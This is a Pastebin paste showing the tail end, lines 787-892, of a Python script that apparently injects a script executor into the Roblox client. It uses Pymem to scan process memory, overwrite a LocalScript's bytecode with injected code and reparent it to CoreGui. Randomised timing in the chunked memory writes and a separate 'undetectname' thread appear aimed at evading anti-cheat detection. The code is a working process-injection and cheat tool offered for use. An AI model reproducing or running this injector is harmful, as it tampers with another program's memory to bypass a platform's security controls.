  787. res = ChaoSpolit.AOBSCANALL(aobs, True)
  788. if res:
  789. valid = False
  790. for i in res:
  791. result = i
  792. offset_result = result - nameOffset
  793. try:
  794. if ChaoSpolit.Pymem.read_longlong(offset_result + 8) == offset_result:
  795. injectScript = offset_result
  796. break
  797. except:
  798. pass
  799. if valid:
  800. break
  801.  
  802. game = toInstance(dataModel)
  803. players = toInstance(game.FindFirstClass("Players"))
  804. localPlayer = toInstance(players.GetChildren()[0])
  805.  
  806.  
  807.  
  808. localBackpack = toInstance(localPlayer.FindFirstClass("Backpack"))
  809. tools = localBackpack.GetChildren()
  810. if len(tools) > 0:
  811. import hashlib
  812. tool = toInstance(tools[0])
  813. targetScript = toInstance(tool.findFirstClass("LocalScript"))
  814. injectScript = toInstance(injectScript)
  815. chunk_size = 40
  816.  
  817.  
  818. original_data = b""
  819.  
  820. for i in range(0, 0x150, chunk_size):
  821. chunk = ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100 + i, chunk_size)
  822. original_data += chunk
  823. time.sleep(random.uniform(0.05, 0.1))
  824. original_hash = hashlib.md5(ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100, 0x150)).hexdigest()
  825. if original_hash != hashlib.md5(original_data).hexdigest():
  826. for i in range(0, 0x150, chunk_size):
  827. chunk = original_data[i:i + chunk_size]
  828. ChaoSpolit.Pymem.write_bytes(targetScript.Self + 0x100 + i, chunk, len(chunk))
  829. time.sleep(random.uniform(0.05, 0.1))
  830. coreGui = toInstance(game.GetChildren()[31])
  831. targetScript.SetParent(coreGui.Self)
  832. print("Successfully attached to this Tool:", tool.Name)
  833. return True
  834. else:
  835. pass
  836.  
  837. workspace = toInstance(game.GetChildren()[0])
  838. character_found = False
  839.  
  840. character_found = False
  841. for obj in workspace.GetDescendants():
  842. obj_name = GetName(obj)
  843. if obj_name == localPlayer.Name:
  844. character = toInstance(obj)
  845. print("Found Character")
  846. character_found = True
  847. break
  848.  
  849. if not character_found:
  850. print("No Character")
  851. return None
  852.  
  853. injectScript = toInstance(injectScript)
  854. import hashlib
  855. animateScript = character.findFirstClass("LocalScript")
  856. targetScript = toInstance(animateScript)
  857. chunk_size = 20
  858.  
  859.  
  860. original_data = b""
  861.  
  862. for i in range(0, 0x150, chunk_size):
  863. chunk = ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100 + i, chunk_size)
  864. original_data += chunk
  865.  
  866. original_hash = hashlib.md5(ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100, 0x150)).hexdigest()
  867. if original_hash != hashlib.md5(original_data).hexdigest():
  868. for i in range(0, 0x150, chunk_size):
  869. chunk = original_data[i:i + chunk_size]
  870. ChaoSpolit.Pymem.write_bytes(targetScript.Self + 0x100 + i, chunk, len(chunk))
  871.  
  872. coreGui = toInstance(game.GetChildren()[31])
  873. targetScript.SetParent(coreGui.Self)
  874. return True
  875.  
  876.  
  877.  
  878. if __name__ == "__main__":
  879. global name
  880. name = threading.Thread(target=undetectname)
  881. name.start()
  882.  
  883. input("Press Enter to inject!")
  884. if inject():
  885. Roblox = ChaoSpolit.YieldForProgram(f"{selector}")
  886. print("Reset your character to load the executor")
  887. stop_thread = True # Stop the thread
  888. name.join() # Wait for the thread to finish
  889. os._exit(1)
  890. else:
  891. Roblox = ChaoSpolit.YieldForProgram(f"{selector}")
  892. print("\033[35mError during injection! Line: Rsp12\033[0m")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!